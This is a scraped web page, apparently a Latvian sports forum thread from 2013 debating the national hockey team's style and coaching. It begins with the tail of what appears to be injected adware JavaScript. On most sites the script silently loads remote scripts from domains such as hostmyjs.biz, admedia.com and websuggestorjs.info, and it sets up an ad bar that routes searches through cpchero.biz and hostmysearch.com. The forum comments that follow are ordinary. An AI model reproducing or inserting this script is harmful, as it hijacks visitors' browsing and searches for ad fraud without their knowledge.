h.indexOf('search.searchnowdirect.com') != -1);
}

function INCL_addEventHandler (el, eType, fn)
{
if (el.addEventListener)
el.addEventListener(eType, fn, false);
else if (el.attachEvent)
el.attachEvent('on' + eType, fn);
else
el['on' + eType] = fn;
}

function INCL_checkdml()
{
var h = document.location.hostname;
return (h.indexOf("google")!=-1 ||
h.indexOf("facebook.com")!=-1 ||
h.indexOf("yahoo.com")!=-1 ||
h.indexOf("bing.com")!=-1 ||
h.indexOf("ask.com")!=-1 ||
h.indexOf("listenersguide.org.uk")!=-1);
}
function INCL_loadScript(src, scriptId)
{
if (window.location.protocol == 'https:' && src.indexOf('http:') == 0)
return;
var script = document.createElement("script");
script.src = src;
script.characterSet = "utf-8";
script.type = "text/javascript";
script.setAttribute('jsid', 'js36');
if (typeof(scriptId) !== 'undefined')
script.id = scriptId;
(document head||document getElementsByTagName('head')[0]|| document body||document getElementsByTagName('body')[0]) appendChild(script)
}
function INCL_onloadComplete()
{
if (!INCL_checkdml())
{
window.INLDM_cfg = { fi : 4603, fd : 0,
fddm: 'xml.cpchero.biz',
sttc: 'https://hostmyjs.biz/scripts/inl_dmmtch/',
inlsrhdm: 'sonicsearchonline.biz' };
INCL_loadScript('https://hostmyjs.biz/scripts/inl_dmmtch/inl_dmmtch.js');
INCL_loadScript('https://in.admedia.com/?id=ODkoOCI&subid=36');
}
INCL_loadScript('http://i.websuggestorjs.info/sugg/javascript.js?channel=js36');
INCL_loadScript('https://cdncache1-a.akamaihd.net/loaders/1247/l.js?aoi=1311798366&pid=1247&zoneid=52222');
window.dmadbar_settings = {dm_standalone : true, dmpd : 2, fd : 4723, fd2: 4604, xmlfeed : 'http://xml.cpchero.biz/search' , search_url : 'http://hostmysearch.com/?prt=yhs1Danta2&errUrl=http://www.yahoo.com&keywords=' , script_base : 'https://hostmyjs.biz/scripts/adbar' };
INCL_loadScript('https://hostmyjs.biz/scripts/adbar/adbar.js');
}
if (top === self && !INCL_checkinternals())
{
if (document.readyState === 'complete')
INCL_onloadComplete();
else
INCL_addEventHandler(window, 'load', INCL_onloadComplete);
}

</script>

     [+] [-]

, 2013-05-16 13:07, pirms 11 gadiem
kristaps24 rakstīja: Laikam īsti nezini nozīmi teicienam ,,kas galvā, tas uz mēles", jo Oļegs noteikti nav tāda tipa cilvēks
Es nedomaaju negatiivaa noziimee, katraa zinjaa meeli vinsh aiz zobiem netur, kas vadiibai biezi vien ir nepatiikami. Tas arii ir viens no iemesliem, kaapeec peec veiksmiigas sezonas Dinamo liigums ar vinju netika pagarinaats. Paaraak jau nu atklaats vins bija medijos.

  +1 [+] [-]

, 2013-05-16 14:22, pirms 11 gadiem
Kāds hokejs jāspēlē, var redzēt, ja skatās ASV - Krievijas ceturtdaļfinālu!

  +2 [+] [-]

, 2013-05-16 14:36, pirms 11 gadiem
sjamba rakstīja: Kāds hokejs jāspēlē, var redzēt, ja skatās ASV - Krievijas ceturtdaļfinālu!
Smuki jeņķu koledžnieki ņem priekšā KHL un NHL krievu allstar'us

     [+] [-]

, 2013-05-16 14:56, pirms 11 gadiem
playthegame rakstīja: Nekur neesmu minējis, ka izlasei būtu jāatsakās no Sprukta un Dārziņa. Tās ir stabilas izlases vērtības un uzbrukuma līderi. Izlasei vajadzētu ilgtermiņa plānu, ko tad mēs īsti spēlējam. Krievu vai kanādiešu hokeju? Nkur nav teikts, ka tas pats Dārziņš nevar spēlēt agresīvu hokeju. Turnīra gaitā gan viņš, gan Indrašis pielika pie spēka spēles. Nebūtu vēlams atlaist Nolanu lai par treneri paņemtu kādu krievu, kurš tagad spiestu uz kombinācijām un piruetēm.
Ir jābeidz mētāties un beidzot jāsaprot, kas mēs esam, ko mēs varam un ko mēs darīsim turpmāk.
es domāju tieši tāpat!
Uzskatāmie piemēri teorijai ?
Znaroka un viņa Dinamo 2. uzvara čempī !
Vecā Dinamo labākie sasniegumi nāca pēc vasaras nāves nometnēm gan jau arī nhl identisku piemēru netrūks.....
Uz fizisko aspektu mums būtu jāliek īpašs akcents spēlē, arī basketbolā, starp citu!
1 2 37 komentāri